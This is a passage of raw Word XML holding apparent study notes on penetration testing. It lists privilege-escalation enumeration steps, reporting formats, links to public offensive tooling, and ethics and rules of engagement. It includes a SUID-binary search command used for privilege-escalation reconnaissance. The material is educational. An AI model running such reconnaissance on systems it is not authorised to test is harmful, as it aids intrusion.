          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Running scripts or commands to enumerate system settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094FA24A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F11A448" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D84F38" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F641B37" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Assist in cleaning up exploit code and recommend methods to prevent attacks in the future</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E750131" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Carefully track and notate all of the tasks performed as part of the penetration test to assist in fixing vulnerabilities and recommending changes to the system owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBAA84" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F894B37" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Findings and Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61175ED6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Criticality of the findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E1A1F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Description or brief overview of how the finding was discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D040F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Remediation recommendations to resolve finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F718366" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Three formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CAB2A1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Vuln scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B338468" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Findings summary list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026B7349" w14:textId="383DD91E" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Full formal report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF3216" w14:textId="348C98AA" w:rsidR="00B51D6E" w:rsidRDefault="00B51D6E" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C96E74" w14:textId="7B8C772F" w:rsidR="00B51D6E" w:rsidRDefault="00B51D6E" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>general</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C54BD2" w14:textId="0DE64DD7" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61796384" w14:textId="05BF7ADC" w:rsidR="00B51D6E" w:rsidRDefault="00B51D6E" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8F622" w14:textId="75366CDA" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BEA1A83" w14:textId="29869722" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/rebootuser/LinEnum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="628C2268" w14:textId="3FA55AA3" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6534099D" w14:textId="70B37D04" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/mzet-/linux-exploit-suggester</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E709937" w14:textId="616B35E9" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C278FB9" w14:textId="29EE17E4" w:rsidR="00B51D6E" w:rsidRDefault="00B51D6E" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E175B79" w14:textId="7D6462A2" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.fuzzysecurity.com/tutorials/16.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E1C778D" w14:textId="148FED8F" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BF8C3E0" w14:textId="28B0CAA0" w:rsidR="00B51D6E" w:rsidRDefault="007A6E65" w:rsidP="00B51D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00B51D6E" w:rsidRPr="00EB5100">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/411Hall/JAWS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C0E8E6F" w14:textId="10C57067" w:rsidR="00B51D6E" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Pentesting Fundamentals (continued)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175DBAA" w14:textId="075D11EF" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Penetration Testing Ethics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885A1B8" w14:textId="5A21BC9F" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>authorized audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E0A4F" w14:textId="7A5A7AC9" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scope of penetration testing agreement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C257D22" w14:textId="687EDD1C" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>legal frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5789A" w14:textId="1154A380" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NCSC CHECK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771117A0" w14:textId="55C958AB" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hat Category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B8E96" w14:textId="02669DFE" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>White Hat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7C542" w14:textId="09BE47E4" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Grey Hat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D8AD33" w14:textId="29414D6E" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Black Hat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494439AC" w14:textId="17BFE102" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RoE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727C12D" w14:textId="5044D659" w:rsidR="000A2554" w:rsidRDefault="007A6E65" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="000A2554" w:rsidRPr="00204A9C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sansorg.egnyte.com/dl/bF4I3yCcnt/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000A2554" w:rsidRPr="000A2554">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04F466" w14:textId="05CB4B53" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63155584" w14:textId="503880F8" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Test Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B88595" w14:textId="0DFD9DFD" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A29D52" w14:textId="119C9AC4" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Penetration Testing Methodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21AE7B" w14:textId="09507894" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E7FC2" w14:textId="3DFD82B4" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration/Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C0DC1" w14:textId="5BAAE823" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46987F6D" w14:textId="0D270E18" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E546BC9" w14:textId="096AB9D2" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
